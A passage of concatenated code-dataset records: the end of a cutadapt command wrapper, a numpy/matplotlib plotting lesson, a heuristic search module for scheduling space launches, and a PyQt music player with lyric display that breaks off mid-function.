ValueError(\n 'Missing R2 output file for input {0}'.\\\n format(read2_fastq_in))\n cmd.\\\n append('-p {0}'.format(read2_fastq_out))\n cmd.\\\n extend([\n '-o {0}'.format(read1_fastq_out),\n read1_fastq_in])\n if read2_fastq_in is not None:\n cmd.\\\n append(read2_fastq_in)\n cmd = \\\n ' '.join(cmd)\n if dry_run:\n return cmd\n if singularity_image_path is not None:\n check_file_path(singularity_image_path)\n log_dir = get_temp_dir(use_ephemeral_space=True)\n bind_dir_list = [\n os.path.dirname(read1_fastq_out),\n os.path.dirname(read1_fastq_in)]\n if read2_fastq_in is not None:\n bind_dir_list.\\\n extend([\n os.path.dirname(read2_fastq_in),\n os.path.dirname(read2_fastq_out)])\n bind_dir_list = \\\n list(set(bind_dir_list))\n execute_singuarity_cmd(\n image_path=singularity_image_path,\n command_string=cmd,\n log_dir=log_dir,\n task_id='cutadapt',\n bind_dir_list=bind_dir_list)\n else:\n subprocess.check_call(cmd,shell=True)\n return cmd\n except Exception as e:\n raise ValueError(\n 'Failed to run cutadapt, error: {0}'.\\\n format(e))","sub_path":"igf_data/utils/tools/cutadapt_utils.py","file_name":"cutadapt_utils.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482671949","text":"# Lessons 23-24\nimport numpy as np\nimport scipy.stats\nimport bootcamp_utils\n\n# Plotting tool\nimport matplotlib.pyplot as plt\n\n# Plot options in seaborn\nimport seaborn as sns\nrc = {'lines.linewidth': 4, 'axes.labelsize': 25,\n 'axes.titlesize': 30, 'lines.markersize': 20,\n 'legend.fontsize': 20}\nsns.set(rc=rc)\n\ndata_txt = np.loadtxt('data/collins_switch.csv', delimiter=',', skiprows=2)\n\n# Slice out data\niptg = data_txt[:,0]\ngfp = data_txt[:,1]\n\n# Slice out stanard error\nsem = data_txt[:,2]\n\n\n# plot the data\n# plt.semilogx(iptg, gfp, linestyle='none', marker='.')\nplt.errorbar(iptg, gfp, yerr=sem, linestyle='none',\n marker='.')\n\n# Axes and Title\nplt.xlabel('IPTG Concentration (mM)')\nplt.ylabel('Normalized GFP')\nplt.xscale('symlog')\n\nplt.title('IPTG titration')\n\n# margins\nplt.margins(0.2)\n\nplt.show()\nplt.close()\n\n# Plot CDFs (instead of histograms)\n\n# Load the food data. 
(no need to specify delimiter)\nxa_high = np.loadtxt('data/xa_high_food.csv', comments='#')\nxa_low = np.loadtxt('data/xa_low_food.csv', comments='#')\n\n# Compute ECDF\nx_high, ecdf_high = bootcamp_utils.ecdf(xa_high)\nx_low, ecdf_low = bootcamp_utils.ecdf(xa_low)\n\n# Plot the ecdf\nplt.plot(x_high, ecdf_high, marker='.', linestyle='none',\n alpha=0.5)\nplt.plot(x_low, ecdf_low, marker='.', linestyle='none',\n alpha = 0.5)\n\n# Axes and title\nplt.xlabel('Crossectional area ($\\mu m ^2$)')\nplt.ylabel('ECDF')\n\nplt.legend(('high concentration', 'low concentration'), loc='lower right')\nplt.margins(0.05)\n\n# Exercise 5\n\n# Find ranges of data# Find range for bin boundaries\nglobal_min = np.min(np.concatenate((xa_low, xa_high)))\nglobal_max = np.max(np.concatenate((xa_low, xa_high)))\n\n# Generate points to plot normal CDFs\nx = np.linspace(global_min-50, global_max+50, 400)\n\nnorm_cdf_high = scipy.stats.norm.cdf(x, loc=np.mean(xa_high),\n scale=np.std(xa_high))\n\nnorm_cdf_low = scipy.stats.norm.cdf(x, loc=np.mean(xa_low),\n scale=np.std(xa_low))\n\nplt.plot(x, norm_cdf_high, '-k')\nplt.plot(x, norm_cdf_low, '-k')\n\nplt.show()\n","sub_path":"l23_24.py","file_name":"l23_24.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315433053","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\n\n'''\nFUNCTIONS (auxiliar) - simplify problem \n'''\n\ndef check_launchable(comp_list, launch):\n total_weight=0\n for comp in comp_list:\n total_weight+=comp.w\n if total_weight>launch.pl:\n return False\n elif total_weight== launch.pl:\n return -1\n else:\n return True\n \ndef launch_cost(comp_list,launch):\n total_cost=0\n for comp in comp_list:\n total_cost+=comp.w*launch.costv\n if total_cost !=0:\n total_cost+=launch.costf\n return total_cost\n\ndef check_list(state, node_list):\n for node in node_list:\n if sorted(node.state.comp, key=lambda x: x.id) == sorted(state.comp, key=lambda x: x.id) and node.state.l==state.l: #they have the same comp\n return node\n return False\n \ndef solution(path, cost=0, i=0):\n if path == False:\n \n print('\\t There is no solution for the given problem.')\n return\n else:\n for launch in path:\n if launch[1] == []: # no component sent\n continue\n print('At launch: ',launch[0],'\\t send: ', launch[1])\n print('\\t Total launch cost:',cost,'\\t iteration:',i)\n\n\n'''\nCLASSES (auxiliar) - read from file\n component, edge, launch\n'''\n\nclass MyComponent:\n def __init__(self,id1='none',w=0):\n self.id = id1\n self.w = float(w)\n def __repr__(self):\n return 'Comp:{}({})'.format(self.id, self.w)\n def view(self):\n print('{}: ID={}, Weight={}'.format(self.__class__.__name__, self.id, self.w))\n \nclass MyConnect:\n def __init__(self,id1='none',id2='none'):\n self.id1 = id1\n self.id2 = id2 \n def __repr__(self):\n return 'Con:{}-{}'.format(self.id1,self.id2)\n def view(self):\n print('{}: ID1={}, ID2={}'.format(self.__class__.__name__, self.id1, self.id2))\n \nclass MyLaunch:\n def __init__(self,datee='310122000', payload=0, CostFixed=0, CostVar=0):\n self.date=date(year=int(datee[4:8]), month=int(datee[2:4]), day=int(datee[0:2]))\n self.pl=float(payload)\n self.costf=float(CostFixed)\n self.costv=float(CostVar)\n def __repr__(self):\n return 'Lau:{}[{}] ({}+{})'.format(self.date, self.pl, self.costf, self.costv)\n def view(self):\n print('{}: Date={}, Payload={}, Costs=(Fix={}, Var={})'.format(\n 
self.__class__.__name__,self.date,self.pl,self.costf,self.costv))\n def __eq__(self, other):\n if not bool(self) and not bool(other): # if both launches are set as false\n return True\n elif not bool(self) or not bool(other): #if only one launch is false\n return False\n else:\n return self.date==other.date\n \n'''\nCLASSES (main) - necessary for general search\n state, node, problem\n'''\n\nclass MyState:\n def __init__(self,lcomp=[],nlaun=[]):\n '''components in space + next launch'''\n self.comp=lcomp\n self.l=nlaun\n def __repr__(self):\n return 'Stt:{}({})'.format(self.comp, self.l)\n def view(self):\n print('{}: Comp={}, Launch={}'.format(self.__class__.__name__, self.comp, self.l))\n\n def __eq__(self, other):\n return self.comp==other.comp and self.l==other.l\n\nclass MyNode:\n def __init__(self,state=MyState(),g=0,path=[],h=0):\n self.state=state\n self.path=path\n self.cost=g\n self.heur=h\n self.f=g+h\n \n def __repr__(self):\n return '{}: State={}, Cost={}, Path={}, f={}'.format(self.__class__.__name__,\n self.state, self.cost,self.path,self.f)\n def __lt__(self, other): \n return self.f < other.f #order nodes by value of f function\n \nclass MyProblem:\n def __init__(self,Components=[],Edges=[],Launches=[],GoalState=[],InitialState=[]):\n self.InitialState=InitialState\n self.GoalState=GoalState\n self.CompL=Components\n self.EdgeL=Edges\n self.LaunL=Launches\n \n def __repr__(self):\n return '{}:\\n Components... {}\\n Edges... {}\\n Launches... {}\\n InitialState={}\\n GoalState={}\\n'.format(self.__class__.__name__,\n self.CompL, self.EdgeL, self.LaunL, self.InitialState, self.GoalState) \n \n def goaltest(self,state):\n if self.GoalState.comp==state.comp: #states must be sorted\n return True\n else:\n return False\n \n # Reads information from file and stores in problem lists\n def read_file(self, txt): \n file = open(txt,'r') # Opens the .txt file with all the information\n l1 = file.readlines() # Reads all lines from file to a list, one line per entry\n V_list = list() # Initiallize empty lists\n E_list = list() # Initiallize empty lists\n L_list = list() # Initiallize empty lists\n \n for n in l1: # Groups the elements of l1 into 3 categories: V, E and L\n s1 = str(n)\n aux = s1.split()\n if(s1[0]=='V'):\n V_list.append(MyComponent(aux[0],aux[1]))\n elif(s1[0]=='E'):\n E_list.append(MyConnect(aux[1],aux[2]))\n elif(s1[0]=='L'):\n L_list.append(MyLaunch(aux[1],aux[2],aux[3],aux[4]))\n L_list.sort(key=lambda x: x.date)\n \n self.CompL=V_list\n self.EdgeL=E_list\n self.LaunL=L_list\n \n # Receives one component and returns a list of components directly conected to it\n def adjacent(self, comp):\n adj_list=[] # list with adjacent components (to be returned)\n if comp==[]: # no componnets in space\n for comp in self.CompL:\n adj_list.append(comp)\n return adj_list\n for edge in self.EdgeL:\n if comp.id==edge.id1: # check if component is on this edge\n aux=edge.id2\n elif comp.id==edge.id2:\n aux=edge.id1\n else: continue\n for comp_adj in self.CompL: # identidy conected component in component list\n if aux==comp_adj.id:\n break\n adj_list.append(comp_adj)\n return adj_list\n \n # Recieves the current state and returns all possible actions (respecting problem constrains)\n def action_func(self, state):\n if not state.l[0]: # if there are no more launches\n return []\n actions=[[]] # send nothing is always an option\n act_imp = list() # Initiallize empty lists\n act_unk = list()\n act_aux = list()\n if state.comp != []: # if we have components in space we should mark them as 
impossible to re-launch\n for comp_x in state.comp:\n act_imp.append([comp_x])\n \n if state.comp==[]: # calculate adjacent components when nothing is in space\n act_aux=self.adjacent(state.comp)\n else: # calculate adjacent components to each component already in space\n for comp in state.comp:\n act_aux+=self.adjacent(comp)\n \n for action in act_aux: # save each adjacent component as a list of one component\n act_unk.append([action])\n \n while act_unk!=[]: # do until all possible possible actions are explored\n action = act_unk.pop(0)\n mask=[set(action).issuperset(aa) for aa in act_imp]\n if True in mask: # if action contains a group of imp components, do nothing\n pass\n elif not check_launchable(action,state.l[0]): # if action is too heavy for launch add to impossible list\n act_imp.append(action)\n else: # if action is possible add to actions list and add adjacent nodes to actions unknown\n actions.append(action)\n for comp in action+state.comp: # calculate adjacent components for all components to be launched AND already in space\n sub_act = self.adjacent(comp)\n for sub in sub_act:\n if not sub in action: # if adjacent isn't already set to be launched \n action_sub=action+[sub]\n mask=[sorted(action_sub, key=lambda x: x.id) == sorted(aa, key=lambda x: x.id) for aa in actions+act_unk]\n if not True in mask: # check if the same group of components was already set to be launched before (in another order)\n act_unk.append(action_sub)\n return actions\n \n # Recieves the current state and estimates consistent value to achieve goal\n def heuristic(self, state):\n heur_cost=0 # variable to be returned \n\n remain_comp = [item for item in self.CompL if item not in state.comp] # list of components still to be launched\n remain_w = sum(comp.w for comp in remain_comp) # total weight of all components to be launched \n \n if state.l[0]==False: # if there are no more launches remaining\n if remain_comp == []:\n return 0\n else:\n return 1995 # act as a flag to be sent when it is impossible to achieve goal\n \n mask=[state.l[0]==launch for launch in self.LaunL] # compare launch with launch list and flag index\n remain_laun=self.LaunL[mask.index(True):] # create list with remaining launcehs\n \n if remain_w > sum(l.pl for l in remain_laun): # if there is more weight to be launched than total available payload\n return 1995\n \n min_cost_list = sorted(remain_laun, key= lambda x: (x.costf+(x.costv*x.pl))/x.pl) # order by specific cost (total cost per weight)\n \n while remain_w > 0:\n launch=min_cost_list.pop(0)\n sp_cost = (launch.costf+(launch.costv*launch.pl))/launch.pl # specific cost\n if remain_w <= launch.pl: # if all components can be send in this launch\n heur_cost += sp_cost*remain_w\n remain_w = 0\n else:\n heur_cost += sp_cost*launch.pl\n remain_w -= launch.pl # subtract launched payload from total weight to be launcehd\n return heur_cost\n \n # unused alternative heuristic\n def heuristic2(self, state):\n heur_cost=0 # variable to be returned \n \n remain_comp = [item for item in self.CompL if item not in state.comp] # list of components still to be launched\n remain_w = sum(comp.w for comp in remain_comp) # total weight of all components to be launched \n \n if state.l[0]==False: # if there are no more launches remaining\n if remain_comp == []:\n return 0\n else:\n return 1995 # define a flag to be sent when it is impossible to achieve goal\n \n mask=[state.l[0]==launch for launch in self.LaunL] # compare launch with launch list and flag index\n 
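        # e.g. if state.l[0] is the 3rd of 5 launches, mask is [False, False, True, False, False], so the slice below keeps launches 3..5\n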
remain_laun=self.LaunL[mask.index(True):]\n \n if remain_w > sum(l.pl for l in remain_laun): # if there is more weight to be launched than total available payload\n return 1995\n \n min_costv_list = sorted(remain_laun, key= lambda x: x.costv) # order remaining launches by variable cost\n min_costf_list = sorted(remain_laun, key= lambda x: x.costf/x.pl) # order by fixed cost per weight\n \n aux_w = remain_w\n while remain_w > 0:\n launchV = min_costv_list.pop(0) # pop launch with lowest variable cost\n if remain_w <= launchV.pl: # if all components can be send in this launch\n heur_cost += remain_w*launchV.costv # variable cost of sending remaining comp\n remain_w = 0\n else:\n heur_cost += launchV.pl*launchV.costv # variable cost of sending maximung payload\n remain_w -= launchV.pl # subtract launched payload from total weight to be launcehd\n \n remain_w=aux_w\n while remain_w > 0:\n launchF = min_costf_list.pop(0) # pop launch with lowest fix cost\n if remain_w <= launchF.pl: # if all components can be send in this launch\n heur_cost += remain_w/launchF.pl*launchF.costf\n remain_w = 0\n else:\n heur_cost += launchF.costf # fix cost of using one launch\n remain_w -= launchF.pl\n return heur_cost\n \n # Receives a node, a action and a search method and computes the child node\n def childnode(self,node,action,search):\n nextstateC = node.state.comp + action # next state comp = comp already in space + comp launched\n nextstateC.sort(key= lambda x: x.id) # always store state with sorted components\n mask=[node.state.l[0]==launch for launch in self.LaunL]\n if mask[-1]: # if next launch is the last define next launch as False\n nextstateL=[False]\n else: # if there are more launches set next launch as the next in time\n nextstateL=[self.LaunL[mask.index(True)+1]]\n nextState = MyState(nextstateC,nextstateL)\n nextpath = node.path+[[node.state.l[0],action]] # update path with launch used and what was sent\n nextcost = node.cost + launch_cost(action,node.state.l[0])\n if search == '-i':\n next_h = self.heuristic(nextState)\n elif search == '-i2':\n next_h = self.heuristic2(nextState)\n else:\n next_h = 0\n NextNode = MyNode(nextState, nextcost, nextpath, next_h)\n return NextNode","sub_path":"problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":13541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"33443108","text":"#! 
/usr/bin/env python3\n\nimport json\nimport pathlib\nimport random\nimport re\nimport sys\nimport taglib\nimport time\nfrom enum import Enum\nfrom typing import List, Dict, Tuple\n\nimport chardet\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtMultimedia import *\nfrom PyQt5.QtWidgets import *\n\n\nclass Config(object):\n config_path = pathlib.Path('~/.config/rawsteel-music-player').expanduser()\n config_path.parent.mkdir(parents=True) if not config_path.parent.exists() else None\n\n def __init__(self):\n super().__init__()\n self.playbackMode = MyPlaylist.PlaybackMode.LOOP\n self.playlist: List[MusicEntry] = list()\n self.volume = 50\n self.currentIndex = -1\n self.sortBy = 'ARTIST'\n self.sortOrder = 'ASCENDING'\n\n @staticmethod\n def load():\n print(\"Prepare to load config ...\")\n config = Config()\n if Config.config_path.exists():\n print(\"Loading config ...\")\n jd = json.loads(Config.config_path.read_text())\n config.playbackMode = MyPlaylist.PlaybackMode(jd['playbackMode'])\n for item in jd['playlist']:\n config.playlist.append(MusicEntry(\n pathlib.Path(item['path']),\n item['artist'],\n item['title'],\n item['duration']\n ))\n config.volume = jd['volume']\n config.currentIndex = jd['currentIndex']\n config.sortBy = jd['sortBy']\n config.sortOrder = jd['sortOrder']\n else:\n print(\"Config not exist\")\n return config\n\n def persist(self):\n print(\"Persisting config ...\")\n jd = dict(\n playbackMode=self.playbackMode.value,\n playlist=[dict(path=str(x.path), artist=x.artist, title=x.title, duration=x.duration)\n for x in self.playlist],\n volume=self.volume,\n currentIndex=self.currentIndex,\n sortBy=self.sortBy,\n sortOrder=self.sortOrder\n )\n jt = json.dumps(jd, indent=4, ensure_ascii=False)\n self.config_path.write_text(jt)\n\n\nclass MusicEntry(object):\n\n def __init__(self, path, artist, title, duration) -> None:\n super().__init__()\n self.path: pathlib.PosixPath = path\n self.artist: str = artist\n self.title: str = title\n self.duration: int = duration\n\n\ndef parse_lyric(text: str):\n regex = re.compile('((\\[\\d{2}:\\d{2}.\\d{2}\\])+)(.+)')\n lyric: Dict[int, str] = dict()\n for line in text.splitlines():\n line = line.strip()\n if not line:\n continue\n line = re.sub('(\\d{2})\\d\\]', '\\\\1]', line)\n match = regex.match(line)\n if not match: continue\n time_part = match.groups()[0]\n lyric_part = match.groups()[2].strip()\n for i in range(0, len(time_part), 10):\n this_time = time_part[i:i + 10]\n minutes, seconds = this_time[1:-1].split(':')\n milliseconds = int((int(minutes) * 60 + float(seconds)) * 1000)\n lyric[milliseconds] = lyric_part\n return lyric\n\n\nclass LoadPlaylistTask(QThread):\n music_found_signal = pyqtSignal(tuple)\n musics_found_signal = pyqtSignal(list)\n\n def __init__(self) -> None:\n super().__init__()\n self.music_files: List[pathlib.Path] = list()\n\n def run(self) -> None:\n print(\"Loading playlist...\")\n count = len(self.music_files)\n musics = list()\n for index, f in enumerate(self.music_files):\n # print(\"Scanning for {}\".format(f))\n artist, title = 'Unknown', 'Unknown'\n if '-' in f.stem: artist, title = f.stem.rsplit('-', maxsplit=1)\n file = taglib.File(str(f))\n artist = file.tags.get('ARTIST', [artist])[0]\n title = file.tags.get('TITLE', [title])[0]\n duration = file.length * 1000\n music_entry = MusicEntry(path=f, artist=artist, title=title, duration=duration)\n # self.music_found_signal.emit((music_entry, count, index + 1))\n time.sleep(0.0001)\n 
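            # the brief sleep presumably yields this worker thread so queued GUI signals stay responsive during long scans\n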
musics.append((music_entry, count, index + 1))\n if len(musics) == 10:\n self.musics_found_signal.emit(musics)\n musics = list()\n if len(musics) > 0:\n self.musics_found_signal.emit(musics)\n\n\nclass MyQSlider(QSlider):\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.button() == Qt.LeftButton:\n self.setValue(self.minimum() + (self.maximum() - self.minimum()) * ev.x() // self.width())\n ev.accept()\n super().mousePressEvent(ev)\n\n\nclass MyQLabel(QLabel):\n clicked = pyqtSignal(QMouseEvent)\n\n def mouseReleaseEvent(self, ev: QtGui.QMouseEvent) -> None:\n self.clicked.emit(ev)\n\n\nclass MyAboutDialog(QDialog):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.resize(400, 300)\n self.setMaximumWidth(30)\n root = QVBoxLayout(self)\n github = 'https://github.com/baijifeilong/rawsteelp'\n pypi = 'https://pypi.org/project/rawsteel-music-player'\n aur = 'https://aur.archlinux.org/packages/rawsteel-music-player'\n label = QLabel('''\n Application: Rawsteel Music Player\n
\n            Description: A minimal music player with lyric show\n<br/>\n            Author: BaiJiFeiLong@gmail.com \n<br/>\n            Github source: {0}\n<br/>\n            Python PyPI: {1}\n<br/>\n            ArchLinux AUR: {2}\n<br/>\n            License: GPL3\n<br/>
\n Powered by: Python and Qt\n '''.strip().format(github, pypi, aur), self)\n font = label.font()\n font.setPointSize(14)\n label.setFont(font)\n label.setOpenExternalLinks(True)\n button = QPushButton('OK', self)\n about_qt = QPushButton(\"About Qt\", self)\n button.clicked.connect(self.close)\n about_qt.clicked.connect(lambda: QMessageBox.aboutQt(self))\n bottom = QHBoxLayout(self)\n bottom.addStretch(1)\n bottom.addWidget(about_qt)\n bottom.addWidget(button)\n root.addWidget(label)\n root.addLayout(bottom)\n self.setWindowTitle(\"About\")\n self.setLayout(root)\n\n\nclass MyPlaylist(QObject):\n current_index_changed = pyqtSignal(int)\n volume_changed = pyqtSignal(int)\n playing_changed = pyqtSignal(bool)\n position_changed = pyqtSignal(int)\n duration_changed = pyqtSignal(int)\n\n class PlaybackMode(Enum):\n LOOP = 1\n RANDOM = 2\n\n def __init__(self) -> None:\n super().__init__()\n self._player = QMediaPlayer()\n self._playlist = QMediaPlaylist()\n self._musics: List[MusicEntry] = list()\n self._current_index = -1\n self._playback_mode = MyPlaylist.PlaybackMode.LOOP\n self._playing = False\n self._player.positionChanged.connect(self.position_changed.emit)\n self._player.durationChanged.connect(self.duration_changed.emit)\n self._player.stateChanged.connect(self._on_player_state_changed)\n self._history: Dict[int, int] = dict()\n self._history_index = -1\n\n def _on_player_state_changed(self, state):\n print(\"STATE CHANGED\")\n if state == QMediaPlayer.StoppedState:\n print(\"STOPPED\")\n self.next()\n self.play()\n\n def add_music(self, music: MusicEntry):\n self._musics.append(music)\n\n def remove_music(self, index):\n del self._musics[index]\n\n def clear(self):\n self._musics.clear()\n\n def music(self, index):\n return self._musics[index]\n\n def musics(self):\n return self._musics\n\n def play(self):\n if self.music_count() == 0:\n return\n if self._current_index == -1:\n self.set_current_index(0)\n self._player.play()\n self._playing = True\n self.playing_changed.emit(self._playing)\n\n def pause(self):\n self._player.pause()\n self._playing = False\n self.playing_changed.emit(self._playing)\n\n def previous(self):\n if self.music_count() == 0:\n self.set_current_index(-1)\n elif self._playback_mode == self.PlaybackMode.LOOP:\n self.set_current_index(self._current_index - 1 if self._current_index > 0 else self.music_count() - 1)\n else:\n self._history_index -= 1\n if (self._history_index not in self._history) or self._history[self._history_index] >= self.music_count():\n self._history[self._history_index] = self._next_random_index()\n self.set_current_index(self._history[self._history_index])\n\n def next(self):\n if self.music_count() == 0:\n self.set_current_index(-1)\n elif self._playback_mode == self.PlaybackMode.LOOP:\n self.set_current_index(self._current_index + 1 if self._current_index < self.music_count() - 1 else 0)\n else:\n self._history_index += 1\n if (self._history_index not in self._history) or self._history[self._history_index] >= self.music_count():\n self._history[self._history_index] = self._next_random_index()\n self.set_current_index(self._history[self._history_index])\n\n def _next_random_index(self):\n current_index = self._current_index\n next_index = random.randint(0, self.music_count() - 1)\n while self.music_count() > 1 and next_index == current_index:\n next_index = random.randint(0, self.music_count() - 1)\n return next_index\n\n def music_count(self):\n return len(self._musics)\n\n def set_current_index(self, index):\n self._current_index = 
index\n if index > -1:\n music = self._musics[index]\n self._player.blockSignals(True)\n self._player.setMedia(QMediaContent(QUrl.fromLocalFile(str(music.path))))\n self._player.blockSignals(False)\n if self._history_index == -1 and len(self._history) == 0:\n self._history[self._history_index] = index\n else:\n self._player.blockSignals(True)\n self._player.stop()\n self._player.blockSignals(False)\n self.current_index_changed.emit(index)\n\n def current_index(self):\n return self._current_index\n\n def get_playback_mode(self):\n return self._playback_mode\n\n def set_playback_mode(self, mode):\n self._playback_mode = mode\n\n def get_volume(self):\n return self._player.volume()\n\n def set_volume(self, volume):\n self._player.setVolume(volume)\n self.volume_changed.emit(volume)\n\n def get_position(self):\n return self._player.position()\n\n def set_position(self, position):\n self._player.setPosition(position)\n\n def get_duration(self):\n return self._player.duration()\n\n def is_playing(self):\n return self._playing\n\n def index_of(self, music: MusicEntry):\n return self._musics.index(music)\n\n\nclass PlayerWindow(QWidget):\n\n def __init__(self):\n super().__init__()\n self.play_button: QToolButton = None\n self.prev_button: QToolButton = None\n self.next_button: QToolButton = None\n self.playback_mode_button: QToolButton = None\n self.progress_slider: MyQSlider = None\n self.progress_label: QLabel = None\n self.volume_dial: QDial = None\n self.playlist_widget: QTableWidget = None\n self.lyric_wrapper: QScrollArea = None\n self.lyric_label: MyQLabel = None\n self.progress_dialog: QProgressDialog = None\n self.my_playlist: MyPlaylist = MyPlaylist()\n self.load_playlist_task = LoadPlaylistTask()\n self.musics: List[MusicEntry] = list()\n self.lyric: Dict[int, str] = None\n self.prev_lyric_index = -1\n self.config: Config = None\n self.real_row = -1\n self.mime_db = QMimeDatabase()\n self.setup_layout()\n self.setup_events()\n self.setup_player()\n\n def generate_tool_button(self, icon_name: str) -> QToolButton:\n button = QToolButton(parent=self)\n button.setIcon(QIcon.fromTheme(icon_name))\n button.setIconSize(QSize(50, 50))\n button.setAutoRaise(True)\n return button\n\n def setup_events(self):\n self.load_playlist_task.music_found_signal.connect(self.add_music)\n self.load_playlist_task.musics_found_signal.connect(self.add_musics)\n self.play_button.clicked.connect(self.toggle_play)\n self.prev_button.clicked.connect(self.on_play_previous)\n self.next_button.clicked.connect(self.on_play_next)\n self.playback_mode_button.clicked.connect(lambda: self.on_playback_mode_button_clicked())\n self.progress_slider.valueChanged.connect(self.on_progress_slider_value_changed)\n self.volume_dial.valueChanged.connect(self.on_volume_dial_value_changed)\n self.my_playlist.playing_changed.connect(self.on_playing_changed)\n self.my_playlist.position_changed.connect(self.on_player_position_changed)\n self.my_playlist.duration_changed.connect(self.on_player_duration_changed)\n self.my_playlist.current_index_changed.connect(self.on_playlist_current_index_changed)\n self.playlist_widget.doubleClicked.connect(self.dbl_clicked)\n self.lyric_label.clicked.connect(self.on_lyric_clicked)\n\n def on_lyric_clicked(self, event: QMouseEvent):\n if event.button() == Qt.LeftButton:\n if self.lyric is None:\n return\n loc = self.lyric_label.mapFromGlobal(self.lyric_label.cursor().pos())\n line = len(self.lyric) * loc.y() // self.lyric_label.height()\n print(\"clicked\", line)\n time = 
sorted(self.lyric.items())[line][0]\n self.my_playlist.set_position(time)\n elif event.button() == Qt.RightButton:\n menu = QMenu()\n menu.addAction(\"About\")\n menu.triggered.connect(lambda: MyAboutDialog(self).exec())\n menu.exec(QCursor.pos())\n menu.clear()\n\n def on_play_next(self):\n self.my_playlist.next()\n self.my_playlist.play()\n\n def on_play_previous(self):\n self.my_playlist.previous()\n self.my_playlist.play()\n\n def on_volume_dial_value_changed(self, value):\n self.set_volume(value)\n self.config.volume = value\n self.config.persist()\n\n def set_volume(self, volume):\n self.volume_dial.blockSignals(True)\n self.my_playlist.set_volume(volume)\n self.volume_dial.setValue(volume)\n self.volume_dial.blockSignals(False)\n\n def on_playback_mode_button_clicked(self):\n if self.my_playlist.get_playback_mode() == MyPlaylist.PlaybackMode.RANDOM:\n self.set_playback_mode(MyPlaylist.PlaybackMode.LOOP)\n else:\n self.set_playback_mode(MyPlaylist.PlaybackMode.RANDOM)\n self.config.persist()\n\n def set_playback_mode(self, playback_mode: MyPlaylist.PlaybackMode):\n self.config.playbackMode = playback_mode\n if playback_mode == MyPlaylist.PlaybackMode.LOOP:\n self.my_playlist.set_playback_mode(MyPlaylist.PlaybackMode.LOOP)\n self.playback_mode_button.setIcon(QIcon.fromTheme('media-playlist-repeat'))\n else:\n self.my_playlist.set_playback_mode(MyPlaylist.PlaybackMode.RANDOM)\n self.playback_mode_button.setIcon(QIcon.fromTheme('media-playlist-shuffle'))\n\n def on_progress_slider_value_changed(self, value):\n self.my_playlist.set_position(value * 1000)\n\n def on_playing_changed(self, playing: bool):\n if playing:\n self.play_button.setIcon(QIcon.fromTheme('media-playback-pause'))\n else:\n self.play_button.setIcon(QIcon.fromTheme('media-playback-start'))\n\n def on_player_position_changed(self, position: int):\n current = position // 1000\n total = self.my_playlist.get_duration() // 1000\n self.progress_label.setText(\n '{:02d}:{:02d}/{:02d}:{:02d}'.format(current // 60, current % 60, total // 60, total % 60))\n self.progress_slider.blockSignals(True)\n self.progress_slider.setValue(current)\n self.progress_slider.blockSignals(False)\n self.refresh_lyric()\n\n def on_player_duration_changed(self, duration: int):\n total = duration // 1000\n self.progress_slider.setMaximum(total)\n\n def on_playlist_current_index_changed(self, index):\n print(\"Playlist index changed: {}\".format(index))\n self.config.currentIndex = index\n self.config.persist()\n if index == -1:\n self.lyric = None\n self.lyric_label.setText(\"
<center>No music</center>
\")\n self.setWindowTitle('')\n return\n self.progress_slider.setValue(0)\n self.playlist_widget.selectRow(index)\n self.prev_lyric_index = -1\n music = self.my_playlist.music(index)\n self.setWindowTitle('{} - {}'.format(music.artist, music.title))\n music_file = music.path\n lyric_file: pathlib.PosixPath = music_file.parent / (music_file.stem + '.lrc')\n if lyric_file.exists():\n bys = lyric_file.read_bytes()\n encoding = chardet.detect(bys)['encoding']\n try:\n lyric_text = str(bys, encoding='GB18030')\n except UnicodeDecodeError:\n lyric_text = str(bys, encoding=encoding)\n self.lyric = parse_lyric(lyric_text)\n if len(self.lyric) > 0:\n self.refresh_lyric()\n else:\n self.lyric = None\n else:\n self.lyric = None\n print(\"Lyric file not found.\")\n\n def refresh_lyric(self):\n hbar = self.lyric_wrapper.horizontalScrollBar()\n hbar.hide()\n self.lyric_wrapper.horizontalScrollBar().setValue((hbar.maximum() + hbar.minimum()) // 2)\n if self.lyric is None:\n self.lyric_label.setText(\"
<center>Lyric not found or not supported</center>
\")\n return\n current_lyric_index = self.calc_current_lyric_index()\n if current_lyric_index == self.prev_lyric_index:\n return\n self.prev_lyric_index = current_lyric_index\n text = ''\n for i, (k, v) in enumerate(sorted(self.lyric.items())):\n if i == current_lyric_index:\n text += '
{}
'.format(v)\n else:\n text += '
{}
'.format(v)\n self.lyric_label.setText(text)\n self.lyric_wrapper.verticalScrollBar().setValue(\n self.lyric_label.height() * current_lyric_index // len(self.lyric)\n - self.lyric_wrapper.height() // 2\n )\n self.lyric_wrapper.horizontalScrollBar().setValue((hbar.maximum() + hbar.minimum()) // 2)\n\n def calc_current_lyric_index(self):\n entries: List[Tuple[int, str]] = sorted(self.lyric.items())\n current_position = self.my_playlist.get_position()\n if current_position < entries[0][0]:\n return 0\n for i in range(len(self.lyric) - 1):\n entry = entries[i]\n next_entry = entries[i + 1]\n if entry[0] <= current_position < next_entry[0]:\n return i\n return len(self.lyric) - 1\n\n def toggle_play(self):\n if self.my_playlist.is_playing():\n self.my_playlist.pause()\n else:\n self.my_playlist.play()\n\n def setup_player(self):\n self.config = Config.load()\n self.set_playback_mode(self.config.playbackMode)\n self.set_volume(self.config.volume)\n sort_by = dict(ARTIST=0, TITLE=1, DURATION=2)[self.config.sortBy]\n sort_order = Qt.AscendingOrder if self.config.sortOrder == 'ASCENDING' else Qt.DescendingOrder\n self.playlist_widget.horizontalHeader().setSortIndicator(sort_by, sort_order)\n for index, music in enumerate(self.config.playlist):\n self.add_music((music, len(self.config.playlist), index + 1), with_progress=False)\n if len(self.config.playlist) > 0 and self.config.currentIndex >= 0:\n self.my_playlist.set_current_index(self.config.currentIndex)\n\n def add_musics(self, musics):\n for music in musics:\n self.add_music(music)\n\n def add_music(self, entry, with_progress=True):\n music: MusicEntry = entry[0]\n total: int = 